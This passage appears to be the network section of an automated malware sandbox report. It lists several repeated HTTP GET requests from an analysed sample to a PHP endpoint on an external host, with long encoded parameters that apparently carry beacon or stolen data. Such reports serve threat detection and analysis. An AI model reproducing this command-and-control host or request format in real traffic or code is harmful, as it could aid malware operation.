UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
